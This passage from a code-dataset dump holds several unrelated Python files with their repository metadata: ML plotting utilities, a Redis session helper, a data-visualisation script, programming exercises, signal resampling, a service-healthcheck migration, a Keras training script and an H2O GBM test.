声母风格,只返回各个拼音的声母部分(注:有的拼音没有声母,详见 `#27`_)。如: 中国 -> ``zh g``\n #: 首字母风格,只返回拼音的首字母部分。如: 中国 -> ``z g``\n #: 韵母风格,只返回各个拼音的韵母部分,不带声调。如: 中国 -> ``ong uo``\n #: 标准韵母风格,带声调,声调在韵母第一个字母上。如:中国 -> ``ōng uó``\n #: 韵母风格2,带声调,声调在各个韵母之后,用数字 [1-4] 进行表示。如: 中国 -> ``o1ng uo2``\n #: 韵母风格3,带声调,声调在各个拼音之后,用数字 [1-4] 进行表示。如: 中国 -> ``ong1 uo2``\n #: 注音风格,带声调,阴平(第一声)不标。如: 中国 -> ``ㄓㄨㄥ ㄍㄨㄛˊ``\n #: 注音风格,仅首字母。如: 中国 -> ``ㄓ ㄍ``\n\n\nNORMAL = STYLE_NORMAL = Style.NORMAL\n","repo_name":"enzeas/python-gupinyin","sub_path":"gupinyin/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":2995,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"24370435818","text":"import numpy as np\nimport pandas as pd\nimport seaborn as sns\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.utils.multiclass import unique_labels\nfrom sklearn.metrics import roc_curve, auc, precision_recall_curve\nfrom sklearn.model_selection import learning_curve\nfrom sklearn.model_selection import ShuffleSplit\nimport matplotlib.pyplot as plt\n\n\ndef plot_roc_curve( y_predict_proba, y_truth):\n y_score = np.array(y_predict_proba)\n if len(y_truth.shape) == 1:\n dummies = pd.get_dummies(y_truth)\n y_dummies = dummies.values\n else:\n y_dummies = y_truth\n\n y_classes = dummies.columns\n\n # Compute ROC curve and ROC area for each class\n fpr = dict()\n tpr = dict()\n thresholds = dict()\n roc_auc = dict()\n for i, class_name in enumerate(y_classes):\n fpr[i], tpr[i], thresholds[i] = roc_curve(y_dummies[:, i], y_score[:, i])\n roc_auc[i] = auc(fpr[i], tpr[i])\n\n # Compute micro-average ROC curve and ROC area\n fpr[\"micro\"], tpr[\"micro\"], _ = roc_curve(y_dummies.ravel(), y_score.ravel())\n roc_auc[\"micro\"] = auc(fpr[\"micro\"], tpr[\"micro\"])\n\n plt.figure()\n lw = 2\n for i, class_name in enumerate(y_classes):\n plt.plot(fpr[i], tpr[i],\n lw=lw, label='%s (area = %0.2f)' % (class_name, roc_auc[i]))\n\n plt.plot([0, 1], [0, 1], color='navy', lw=lw, linestyle='--')\n plt.xlim([0.0, 1.0])\n plt.ylim([0.0, 1.05])\n plt.xlabel('False Positive Rate')\n plt.ylabel('True Positive Rate')\n plt.title('Receiver operating characteristic')\n plt.legend(loc=\"lower right\")\n\n # threshold for positive class\n ax2 = plt.gca().twinx()\n ax2.plot(fpr[1], thresholds[1], markeredgecolor='r', linestyle='dashed', color='r')\n ax2.set_ylabel('Threshold')\n ax2.set_ylim([thresholds[1][-1], thresholds[1][0]])\n ax2.set_xlim([fpr[1][0], fpr[1][-1]])\n\n # plt.show()\n return plt.gcf()\n\n\ndef plot_precision_recall_curve(y_predict_proba, y_truth):\n y_score = np.array(y_predict_proba)\n if len(y_truth.shape) == 1:\n dummies = pd.get_dummies(y_truth)\n y_dummies = dummies.values\n else:\n y_dummies = y_truth\n\n y_classes = dummies.columns\n for i, class_name in enumerate(y_classes):\n precision, recall, thresholds = precision_recall_curve(y_dummies[:, i], y_score[:, i])\n\n plt.step(recall, precision,\n label=class_name,\n lw=2,\n where='post')\n\n plt.xlabel('Recall')\n plt.ylabel('Precision')\n plt.ylim([0.0, 1.05])\n plt.xlim([0.0, 1.0])\n plt.legend(loc=\"lower left\")\n\n # ax2 = plt.gca().twinx()\n # ax2.plot(recall[1:], thresholds, markeredgecolor='r',linestyle='dashed', color='r')\n # ax2.set_ylabel('Threshold')\n\n # plt.show()\n return plt.gcf()\n\n\ndef plot_confidence_performance(y_predict, y_predict_proba, y_truth, num_bins=20):\n predicted_probabilities = np.max(y_predict_proba, axis=1)\n is_correct = (y_truth == y_predict)\n ax = sns.regplot(x=predicted_probabilities, y=is_correct, x_bins=num_bins)\n plt.xlabel('Model Confidence')\n plt.ylabel('Average accuracy')\n # plt.show()\n return plt.gcf()\n\n\ndef plot_confusion_matrix(y_true, y_pred, classes=None,\n normalize=False,\n title=None,\n cmap=plt.cm.Blues):\n \"\"\"\n This function prints and plots the confusion matrix.\n Normalization can be applied by setting `normalize=True`.\n \"\"\"\n if not title:\n if normalize:\n title = 'Normalized confusion matrix'\n else:\n title = 'Confusion matrix, without normalization'\n\n # Compute confusion matrix\n cm = confusion_matrix(y_true, y_pred)\n if classes is not None:\n # Only use the labels that appear in the data\n classes = classes[unique_labels(y_true, y_pred)]\n else:\n classes = unique_labels(y_true, y_pred)\n\n if normalize:\n cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\n print(\"Normalized confusion matrix\")\n else:\n print('Confusion matrix, without normalization')\n\n print(cm)\n\n fig, ax = plt.subplots()\n im = ax.imshow(cm, interpolation='nearest', cmap=cmap)\n ax.figure.colorbar(im, ax=ax)\n # We want to show all ticks...\n ax.set(xticks=np.arange(cm.shape[1]),\n yticks=np.arange(cm.shape[0]),\n # ... and label them with the respective list entries\n xticklabels=classes, yticklabels=classes,\n title=title,\n ylabel='True label',\n xlabel='Predicted label')\n\n # Rotate the tick labels and set their alignment.\n plt.setp(ax.get_xticklabels(), rotation=45, ha=\"right\",\n rotation_mode=\"anchor\")\n\n # Loop over data dimensions and create text annotations.\n fmt = '.2f' if normalize else 'd'\n thresh = cm.max() / 2.\n for i in range(cm.shape[0]):\n for j in range(cm.shape[1]):\n ax.text(j, i, format(cm[i, j], fmt),\n ha=\"center\", va=\"center\",\n color=\"white\" if cm[i, j] > thresh else \"black\")\n fig.tight_layout()\n return fig\n\n\ndef print_cm(cm, labels, hide_zeroes=False, hide_diagonal=False, hide_threshold=None):\n \"\"\"pretty print for confusion matrixes\"\"\"\n columnwidth = max([len(x) for x in labels] + [5]) # 5 is value length\n empty_cell = \" \" * columnwidth\n\n # Begin CHANGES\n fst_empty_cell = (columnwidth - 3) // 2 * \" \" + \"t/p\" + (columnwidth - 3) // 2 * \" \"\n\n if len(fst_empty_cell) < len(empty_cell):\n fst_empty_cell = \" \" * (len(empty_cell) - len(fst_empty_cell)) + fst_empty_cell\n # Print header\n print(\" \" + fst_empty_cell, end=\" \")\n # End CHANGES\n\n for label in labels:\n print(\"%{0}s\".format(columnwidth) % label, end=\" \")\n\n print()\n # Print rows\n for i, label1 in enumerate(labels):\n print(\" %{0}s\".format(columnwidth) % label1, end=\" \")\n for j in range(len(labels)):\n cell = \"%{0}.1f\".format(columnwidth) % cm[i, j]\n if hide_zeroes:\n cell = cell if float(cm[i, j]) != 0 else empty_cell\n if hide_diagonal:\n cell = cell if i != j else empty_cell\n if hide_threshold:\n cell = cell if cm[i, j] > hide_threshold else empty_cell\n print(cell, end=\" \")\n print()\n\n\ndef plot_learning_curve(estimator, title, X, y, ylim=None, cv=None,\n n_jobs=None, train_sizes=np.linspace(.1, 1.0, 5)):\n \"\"\"\n Generate a simple plot of the test and training learning curve.\n\n Parameters\n ----------\n estimator : object type that implements the \"fit\" and \"predict\" methods\n An object of that type which is cloned for each validation.\n\n title : string\n Title for the chart.\n\n X : array-like, shape (n_samples, n_features)\n Training vector, where n_samples is the number of samples and\n n_features is the number of features.\n\n y : array-like, shape (n_samples) or (n_samples, n_features), optional\n Target relative to X for classification or regression;\n None for unsupervised learning.\n\n ylim : tuple, shape (ymin, ymax), optional\n Defines minimum and maximum yvalues plotted.\n\n cv : int, cross-validation generator or an iterable, optional\n Determines the cross-validation splitting strategy.\n Possible inputs for cv are:\n - None, to use the default 3-fold cross-validation,\n - integer, to specify the number of folds.\n - :term:`CV splitter`,\n - An iterable yielding (train, test) splits as arrays of indices.\n\n For integer/None inputs, if ``y`` is binary or multiclass,\n :class:`StratifiedKFold` used. If the estimator is not a classifier\n or if ``y`` is neither binary nor multiclass, :class:`KFold` is used.\n\n Refer :ref:`User Guide ` for the various\n cross-validators that can be used here.\n\n n_jobs : int or None, optional (default=None)\n Number of jobs to run in parallel.\n ``None`` means 1 unless in a :obj:`joblib.parallel_backend` context.\n ``-1`` means using all processors. See :term:`Glossary `\n for more details.\n\n train_sizes : array-like, shape (n_ticks,), dtype float or int\n Relative or absolute numbers of training examples that will be used to\n generate the learning curve. If the dtype is float, it is regarded as a\n fraction of the maximum size of the training set (that is determined\n by the selected validation method), i.e. it has to be within (0, 1].\n Otherwise it is interpreted as absolute sizes of the training sets.\n Note that for classification the number of samples usually have to\n be big enough to contain at least one sample from each class.\n (default: np.linspace(0.1, 1.0, 5))\n \"\"\"\n plt.figure()\n plt.title(title)\n if ylim is not None:\n plt.ylim(*ylim)\n plt.xlabel(\"Training examples\")\n plt.ylabel(\"Score\")\n train_sizes, train_scores, test_scores = learning_curve(\n estimator, X, y, cv=cv, n_jobs=n_jobs, train_sizes=train_sizes)\n train_scores_mean = np.mean(train_scores, axis=1)\n train_scores_std = np.std(train_scores, axis=1)\n test_scores_mean = np.mean(test_scores, axis=1)\n test_scores_std = np.std(test_scores, axis=1)\n plt.grid()\n\n plt.fill_between(train_sizes, train_scores_mean - train_scores_std,\n train_scores_mean + train_scores_std, alpha=0.1,\n color=\"r\")\n plt.fill_between(train_sizes, test_scores_mean - test_scores_std,\n test_scores_mean + test_scores_std, alpha=0.1, color=\"g\")\n plt.plot(train_sizes, train_scores_mean, 'o-', color=\"r\",\n label=\"Training score\")\n plt.plot(train_sizes, test_scores_mean, 'o-', color=\"g\",\n label=\"Cross-validation score\")\n\n plt.legend(loc=\"best\")\n return plt\n\n\ndef plot_learning_curve_cv(X, y, estimator):\n title=''\n # Cross validation with N iterations to get smoother mean test and train\n # score curves, each time with 20% data randomly selected as a validation set.\n cv = ShuffleSplit(n_splits=5, test_size=0.2, random_state=0)\n plot_learning_curve(estimator, title, X, y, cv=cv, n_jobs=1)\n return plt.gcf()\n","repo_name":"Honeyfy/semi-supervised-text-classification","sub_path":"src/utils/analyze_model.py","file_name":"analyze_model.py","file_ext":"py","file_size_in_byte":10337,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"30909863544","text":"# coding:utf-8\n\"\"\"\n这里是工具模块,用来存放在框架运行的过程中要用的一些功能函数或类\n\nBaseSession 用来保存往redis数据库中保存session信息,继承与字典,然后重写__setitem__和__getitem__方法\n\n\"\"\"\nfrom redis import StrictRedis\nfrom hashlib import sha3_256\n\n\nclass BaseSession:\n \"\"\"\n 类字典类\n 重写关键方法,将原本的操作转到使用redis数据库完成\n \"\"\"\n\n def __init__(self, session_config, secret_key, request_ob):\n self.redis_client = StrictRedis(host=session_config['host'], port=session_config['port'],\n db=session_config['database'])\n self.secret_key = secret_key\n self.request_ob = request_ob\n\n def __setitem__(self, key, value):\n \"\"\"\n 设置session信息,并保存为redis的哈希类型.\n session_id 首先尝试从请求体对象的cookies中找,如果没有则创建新的session_id并添加到请求体对象的set_cookie中去\n :param key:\n :param value:\n :return:\n \"\"\"\n try:\n session_id = self.request_ob.cookies.get('session_id')\n if session_id is None:\n secret_worker = sha3_256()\n secret_worker.update((self.secret_key + key).encode())\n session_id = secret_worker.hexdigest()\n self.request_ob.set_cookies({\"session_id\": session_id})\n session_id = 'miniFrame-session:' + session_id\n self.redis_client.hset(name=session_id, key=key, value=value)\n except Exception as e:\n raise e\n\n def __getitem__(self, key):\n try:\n session_id = self.request_ob.cookies.get('session_id')\n if session_id is None:\n raise KeyError(\n 'The cookies dict by request not have a key named ,'\n 'you may not create a session record before this'\n )\n session_id = 'miniFrame-session:' + session_id\n value = self.redis_client.hget(name=session_id, key=key)\n if value is None:\n raise KeyError(\n \"The session_id or the key nonexistent in redis database\"\n )\n return value.decode()\n except Exception as e:\n raise e\n\n\nclass _MiniFrameMetaClass(type):\n # 用来记录我们自定义父类的所有子类列表\n record_cls = []\n\n # 重写__new__方法,在创建好类后,如果这个类对象不是我们的父类则将这个子类记录下来\n def __new__(cls, name, bases, attrs):\n new_cls = type.__new__(cls, name, bases, attrs)\n if not name.startswith('Base'):\n _MiniFrameMetaClass.record_cls.append(new_cls)\n return new_cls\n\n\nif __name__ == '__main__':\n pass\n","repo_name":"lzc978/common","sub_path":"miniFrame/miniFrame/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2835,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"}
+{"seq_id":"40021700476","text":"import util\nimport numpy as np\nimport datetime\nimport matplotlib.pyplot as plt\nimport calendar\n\nif __name__ == \"__main__\":\n combined = util.load_cdf(\"Visualization/domestic.nc\")\n\n origin_airports = combined.coords[\"Origin\"].values\n destination_airports = combined.coords[\"Destination\"].values\n\n # Setup a nicer datastructure to work with\n # Keep in mind we want this heatmap to work both ways\n all_airports = list(set(origin_airports) | set(destination_airports))\n all_airports = sorted(all_airports)\n airport_indexes = {value: i for i, value in enumerate(all_airports)}\n heatmap_data = np.zeros(shape=(len(all_airports), len(all_airports)))\n\n # Get data for Dec-2019 by default\n # We'll make this animated later\n data = combined.sel(Month=datetime.datetime(2019, 12, 1))\n for origin in origin_airports:\n origin_index = airport_indexes[origin]\n city_data = data.sel(Origin=origin).dropna(dim=\"Destination\", how=\"all\")\n\n for row in city_data.Passengers:\n count = int(row.values)\n destination_index = airport_indexes[str(row.coords[\"Destination\"].values)]\n\n # Set both sides of the array to this value\n heatmap_data[origin_index, destination_index] = count\n heatmap_data[destination_index, origin_index] = count\n\n # Plot the data\n fig, ax = plt.subplots()\n plt.rcParams.update({\"font.size\": 14})\n im = ax.imshow(heatmap_data, cmap=\"plasma\")\n\n # Adjust ticks\n ax.set_xticks(np.arange(len(all_airports)))\n ax.set_yticks(np.arange(len(all_airports)))\n ax.set_xticklabels(all_airports)\n ax.set_yticklabels(all_airports)\n plt.setp(ax.get_xticklabels(), rotation=45, ha=\"right\", rotation_mode=\"anchor\")\n\n # Adjust colorbar\n cbar = ax.figure.colorbar(im, ax=ax)\n cbar.ax.set_ylabel(\"Total Traffic\")\n\n ax.set_title(\"Domestic Traffic - December 2019\")\n fig.tight_layout()\n plt.show()\n","repo_name":"rafraser/COSC3000","sub_path":"Visualization/processing/chart_domestic_heatmap.py","file_name":"chart_domestic_heatmap.py","file_ext":"py","file_size_in_byte":1936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"31117397044","text":"'''\nOverloading: Have Same method name but arguments or type of\narguments are different\n\nexample: + can be used in int, float, string...etc\n\nOperator remains same but operands will change\n\n5+6\n 5 & 6 } Operands\n + } Operator\n\n int.__add__(5,6)\n'''\n\nclass Students:\n def __init__(self, m1, m2):\n self.m1 = m1\n self.m2 = m2\n\n # \"Overloading Operators\"\n def __add__(self, other): # stu1,stu2\n m1 = self.m1 + other.m1\n m2 = self.m2 + other.m2\n s3 = Students(m1,m2)\n\n return s3\n\n def __sub__(self, other):\n m1 = self.m1 - other.m1\n m2 = self.m2 - other.m2\n s4 = Students(m1,m2)\n\n return s4\n\n def __gt__(self, other):\n s1 = self.m1 + self.m2\n s2 = other.m1 + other.m2\n if s1 > s2:\n return True\n else:\n return False\n\n def __str__(self):\n return f\"{self.m1}, {self.m2}\"\n\n'''\nIf you add 2 different operands we have to overload that operator\n'''\nstu1 = Students(60,62)\nstu2 = Students(55,60)\n\nvalue1 = stu1 + stu2\n\n'''\n Stu1 | Stu2\n 50 | 62\n 45 | 60\n _____|_____\n 95 122\n'''\nprint(value1.m1)\nprint(value1.m2)\n\nprint('-'*10)\n\nvalue2 = stu1-stu2\n\n'''\n Stu1 | Stu2\n 50 | 62\n 45 | 60\n _____|_____\n 5 2\n'''\nprint(value2.m1)\nprint(value2.m2)\n\nprint('-'*10)\n\nif stu1 > stu2:\n print(\"stu1 wins!!!\")\nelse:\n print(\"stu2 wins!!!\")\n\n\n'''\nIf you want to perform any operation on the objects \nwhich are user defined we have to use operator overloading\n'''\nprint(\"-\"*10)\nprint(stu1)\nprint(stu2)\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"Vegadhardik7/Python-DSA-MySQL-Dynamic-Programming-Advance-Concepts","sub_path":"Dynamic Programming/019 Operator Overloading.py","file_name":"019 Operator Overloading.py","file_ext":"py","file_size_in_byte":1596,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"23553149381","text":"def tidy(n):\r\n rn = list(map(int, n[::-1]))\r\n l = 0\r\n for i in range(len(rn[:-1])):\r\n if (rn[i] < rn[i+1]):\r\n l = i + 1\r\n rn[i+1] -= 1\r\n\r\n a = rn[::-1]\r\n b = a[:-l or None]\r\n b.extend(l * [9])\r\n return ''.join(str(x) for x in b).lstrip('0')\r\n\r\nf = open('B-small-attempt0.in', 'r')\r\no = open('output', 'w')\r\nt = f.readline()\r\nstrf = \"Case #{case}: {tn}\"\r\n\r\nc = 0\r\nfor n in f:\r\n c += 1\r\n tidy_n = tidy(n.strip())\r\n print('old: ', n.strip(), ' new: ', tidy_n)\r\n o.write(strf.format(case = c, tn = tidy_n))\r\n if( c < int(t)):\r\n o.write(\"\\n\")\r\n\r\n\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_200/1617.py","file_name":"1617.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"33727929059","text":"\n\ndef magic(A,i):\n if len(A) == i : \n print(\"not there\")\n return\n if A[i] == i : \n print(\"magic is %s\" %(str(i)))\n return\n return magic (A,i+1)\n\n\nA = [-40,-20,-1,1,2,3,5,7,9,12,13]\n\nmagic(A,0)\n","repo_name":"rampedro/Cracking-the-coding-interview-leetcode","sub_path":"magic-index.py","file_name":"magic-index.py","file_ext":"py","file_size_in_byte":230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"22759897911","text":"import os\nimport random as python_random\nimport sys\n\n''' TF_CPP_MIN_LOG_LEVEL\n0 = all messages are logged (default behavior)\n1 = INFO messages are not printed\n2 = INFO and WARNING messages are not printed\n3 = INFO, WARNING, and ERROR messages are not printed\n'''\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\nos.environ['TF_XLA_FLAGS'] = '--tf_xla_enable_xla_devices'\nos.environ['PYTHONHASHSEED'] = '0'\n\nimport numpy as np\nimport tensorflow as tf\nfrom tensorflow.keras.callbacks import EarlyStopping, TensorBoard\nfrom tensorflow.keras.metrics import RootMeanSquaredError\nfrom tensorflow.keras.optimizers import Adam\nfrom tensorflow.keras.optimizers.schedules import ExponentialDecay\n\nfrom cfgs import cfg\nfrom models.unet_default import unet_default as Model\nfrom utils.callback import SaveWeightCallback, TimingCallback\nfrom utils.dataset import ImageDataSet\nfrom utils.helper import output_init, plot_train_history, print_cfg\nfrom utils.image import dataset_plot_batch, plot_two_images_array\nfrom utils.preprocessing import train_preprocessing\n\nnp.random.seed(cfg.SEED)\npython_random.seed(cfg.SEED)\ntf.random.set_seed(cfg.SEED)\n\nos.system('nvcc -V')\ngpus = tf.config.list_physical_devices('GPU')\ntf.config.set_visible_devices(gpus[0], 'GPU')\ntf.config.experimental.set_memory_growth(gpus[0], True)\n\n\nif __name__ == \"__main__\":\n fit_verbose = 1\n steps_per_execution = 1\n\n if len(sys.argv) > 1 and sys.argv[1] == \"--prod\":\n fit_verbose = 2\n steps_per_execution = 10000\n\n print_cfg(cfg)\n output_init(cfg)\n\n train_X_obj = ImageDataSet(\"RGB \", input_path=cfg.TRAIN_RGB_PATH, save_image_path=cfg.SAVE_IMAGE_PATH.joinpath(\"train/input\"))\n train_Y_obj = ImageDataSet(\"NDVI\", input_path=cfg.TRAIN_NDVI_PATH, save_image_path=cfg.SAVE_IMAGE_PATH.joinpath(\"train/input\"))\n train_X_obj = train_X_obj.load_data(devided_by_255=False, expand_dims=False).crop(cfg.TRAIN_CROP_DELTA)\n train_Y_obj = train_Y_obj.load_data(devided_by_255=False, expand_dims=False).crop(cfg.TRAIN_CROP_DELTA)\n table = ImageDataSet.generate_resample_table(train_X_obj.num, cfg.TRAIN_RESAMPLE_MULTIPLE_FACTOR, (train_X_obj.height, train_X_obj.width), cfg.TRAIN_RESAMPLE_DIM)\n train_X = train_X_obj.resample(table, cfg.TRAIN_RESAMPLE_DIM).downscale(cfg.TRAIN_DOWNSCALE_FACTOR).get_image_array()\n train_Y = train_Y_obj.resample(table, cfg.TRAIN_RESAMPLE_DIM).downscale(cfg.TRAIN_DOWNSCALE_FACTOR).get_image_array()\n print(f\"RGB array shape: {train_X.shape}\")\n print(f\"NDVI array shape: {train_Y.shape}\")\n\n plot_two_images_array(train_X, train_Y, 'Train - RGB, NDVI', cfg.SAVE_FIGURE_PATH)\n\n batch_size = cfg.TRAIN_BATCH_SIZE\n val_split = cfg.VAL_SPLIT\n steps_per_epoch = int(np.round(train_X.shape[0] / batch_size * (1 - val_split)))\n validation_steps = int(np.round(train_X.shape[0] / batch_size * val_split))\n\n lr_schedule = ExponentialDecay(**cfg.LEARNING_RATE_ARGS)\n\n early_stop_callback = EarlyStopping(**cfg.EARLY_STOP_ARGS)\n save_weight_callback = SaveWeightCallback(save_weight_path=cfg.SAVE_WEIGHT_PATH)\n timing_callback = TimingCallback(epochs=cfg.EPOCHS)\n tensorboard_callback = TensorBoard(**cfg.TENSORBOARD_ARGS)\n callbacks = [early_stop_callback, save_weight_callback, timing_callback, tensorboard_callback]\n\n model = Model(model_name=cfg.MODEL_NAME, input_dim=train_X.shape[1:])\n adam = Adam(learning_rate=lr_schedule)\n model.compile(optimizer=adam, loss=cfg.MODEL_LOSS, metrics=RootMeanSquaredError(), steps_per_execution=steps_per_execution)\n model.summary()\n\n train_Y = train_Y_obj.norm_standard().get_image_array()\n train_ds, validation_ds = train_preprocessing(train_X, train_Y, batch_size=batch_size, cfg=cfg)\n\n # dataset_plot_batch(train_ds, 10, \"train\", cfg.SAVE_FIGURE_PATH)\n # dataset_plot_batch(validation_ds, 10, \"val\", cfg.SAVE_FIGURE_PATH)\n\n train_history = model.fit(\n train_ds,\n epochs=cfg.EPOCHS,\n steps_per_epoch=steps_per_epoch,\n validation_data=validation_ds,\n validation_steps=validation_steps,\n callbacks=callbacks,\n verbose=fit_verbose,\n )\n\n model.save(cfg.SAVE_MODEL_PATH.joinpath(\"trained_model.h5\"))\n plot_train_history(train_history, 'loss', 'val_loss', save_figure_path=cfg.SAVE_FIGURE_PATH)\n\n print(f\"Average epoch time: {np.mean(timing_callback.times):.2f}s\")\n","repo_name":"clearholder2001/Vegetable-Indices-Neural-Network","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4337,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"38536220609","text":"\"\"\"\nScript for calibrating factors using original Rush Hour puzzles\n\"\"\"\n\ndata = []\nwith open(\"originalBoards_limited_scores\") as read:\n for line in read:\n els = line.split(\", \")\n data.append((int(els[0]), float(els[1]), float(els[2]), int(els[3].strip())))\n\ndef getscore(item):\n return item[1]\n\ndef evaluate(l, print=False):\n l.sort(key=getscore)\n\n diff = 0\n for num in range(len(l)):\n diff += abs(l[num][0] - (num+1))\n return diff, l\n\nlowest = float(\"inf\")\nli = 0\nlj = 0\nlk = 0\nthing = None\nfor i in range(0, 100, 1):\n for j in range(0, 100, 1):\n for k in range(0, 100, 1):\n intermed = []\n for item in data:\n id, deps, var, length = item\n if deps == 10 and var == 10 and length == 0:\n continue\n score = i*deps+j*var+k*length\n intermed.append((id, score))\n diff, order = evaluate(intermed)\n if diff int:\n result = [amount+1]*(amount+1)\n result[0] = 0\n for i in range(1, amount+1):\n for coin in coins:\n if i < coin:\n continue\n result[i] = min(result[i], result[i-coin]+1)\n if result[amount] == amount+1:\n return -1\n return result[amount]\n\n\n","repo_name":"chenxino/LeetCode_Notes","sub_path":"labuladong/322.py","file_name":"322.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"}
+{"seq_id":"23455798281","text":"fo = open('A-small-attempt1.in', 'r')\n\ncount = 0\nsumm = 0\nindex = 1\nnext(fo)\nfor line in fo:\n\tfor i in range(2, len(line)-1):\n\t\tl = int(i)-2\n\t\tt = int(line[i])\n\t\tif i == 2:\n\t\t\tsumm = t\n\t\telse:\n\t\t\tif summ+count < l and t != 0:\n\t\t\t\tcount = l-summ+count\n\t\t\t\tsumm = l-summ+count+t\n\t\t\t\t#print('true')\n\t\t\t\t#print(summ, count, l)\n\t\t\telse:\n\t\t\t\tsumm = summ + t\n\t\t\t\t#print('false')\n\t\t\t\t#print(summ, count, l)\n\t\t\n\tprint('Case #' + str(index) + ': ' + str(count))\n\tcount = 0\n\tsumm = 0\n\tindex +=1\n\nfo.close()","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_155/3693.py","file_name":"3693.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"36034447978","text":"from __future__ import division\nimport numpy as np\nimport scipy as sp\nfrom .resample_clone import resample as resample_func\n\n__authors__ = \"Alex Bujan\"\n\n__all__ = ['resample']\n\n\ndef resample(X, new_freq, old_freq, kind=1, axis=-1, same_sign=False):\n \"\"\"\n Resamples the ECoG signal from the original\n sampling frequency to a new frequency.\n\n Parameters\n ----------\n X : array\n Input data, dimensions (n_channels, ..., n_timePoints)\n new_freq : float\n New sampling frequency\n old_freq : float\n Original sampling frequency\n axis : int (optional)\n Axis along which to resample the data\n\n Returns\n -------\n Xds : array\n Downsampled data, dimensions (n_channels, ..., n_timePoints_new)\n \"\"\"\n ratio = float(old_freq) / new_freq\n if np.allclose(ratio, int(ratio)) and same_sign:\n ratio = int(ratio)\n if (ratio % 2) == 0:\n med = ratio + 1\n else:\n med = ratio\n meds = [1] * X.ndim\n meds[axis % X.ndim] = med\n slices = [slice(None)] * X.ndim\n slices[axis % X.ndim] = slice(None, None, ratio)\n Xds = sp.signal.medfilt(X, meds)[slices]\n else:\n time = X.shape[axis]\n new_time = int(np.ceil(time * new_freq / old_freq))\n if kind == 0:\n ratio = int(ratio)\n if (ratio % 2) == 0:\n med = ratio + 1\n else:\n med = ratio\n meds = [1] * X.ndim\n meds[axis % X.ndim] = med\n Xf = sp.signal.medfilt(X, meds)\n f = sp.interpolate.interp1d(np.linspace(0, 1, time), Xf, axis=axis)\n Xds = f(np.linspace(0, 1, new_time))\n else:\n Xds = resample_func(X, new_time, axis=axis)\n\n return Xds\n","repo_name":"BouchardLab/process_ecog","sub_path":"ecog/signal_processing/resample.py","file_name":"resample.py","file_ext":"py","file_size_in_byte":1773,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"17615568873","text":"import logging\nlog = logging.getLogger(\"zen.migrate\")\n\nimport Migrate\nimport servicemigration as sm\nsm.require(\"1.0.0\")\n\n\nclass RetryZopeHealthCheck(Migrate.Step):\n \"Change 'answering' healthcheck to retry a few times on failture\"\n\n version = Migrate.Version(108, 0, 0)\n\n def cutover(self, dmd):\n try:\n ctx = sm.ServiceContext()\n except sm.ServiceMigrationError:\n log.info(\"Couldn't generate service context, skipping.\")\n return\n\n zope_services = filter(lambda s: s.name == 'Zope', ctx.services)\n\n # Update all of the 'answering' healthchecks\n for service in zope_services:\n answeringHealthChecks = filter(lambda healthCheck: healthCheck.name == \"answering\", service.healthChecks)\n for check in answeringHealthChecks:\n check.script = \"curl -o /dev/null --retry 3 --max-time 2 -w '%{redirect_url}' -s http://localhost:9080/zport/dmd | grep -q acl_users\"\n check.interval = 15.0\n log.info(\"Updated 'answering' healthcheck.\")\n\n ctx.commit()\n\nRetryZopeHealthCheck()\n","repo_name":"zenoss/zenoss-prodbin","sub_path":"Products/ZenModel/migrate/retryZopeHealthCheck.py","file_name":"retryZopeHealthCheck.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"61"}
+{"seq_id":"13348526724","text":"import sys\nsys.path.insert(1,\"../../../\")\nimport h2o\nfrom tests import pyunit_utils\nfrom h2o.estimators.gbm import H2OGradientBoostingEstimator\n\ndef fiftycat_gbm():\n # Training set has only 45 categories cat1 through cat45\n train = h2o.import_file(path=pyunit_utils.locate(\"smalldata/gbm_test/50_cattest_train.csv\"))\n train[\"y\"] = train[\"y\"].asfactor()\n\n # Train H2O GBM Model:\n\n model = H2OGradientBoostingEstimator(distribution=\"bernoulli\",\n ntrees=10,\n max_depth=5,\n nbins=20)\n model.train(x=[\"x1\",\"x2\"],y=\"y\", training_frame=train)\n model.show()\n\n # Test dataset has all 50 categories cat1 through cat50\n test = h2o.import_file(path=pyunit_utils.locate(\"smalldata/gbm_test/50_cattest_test.csv\"))\n\n\n # Predict on test dataset with GBM model:\n predictions = model.predict(test)\n predictions.show()\n\n # Get the confusion matrix and AUC\n performance = model.model_performance(test)\n test_cm = performance.confusion_matrix()\n test_auc = performance.auc()\n\n\n\nif __name__ == \"__main__\":\n pyunit_utils.standalone_test(fiftycat_gbm)\nelse:\n 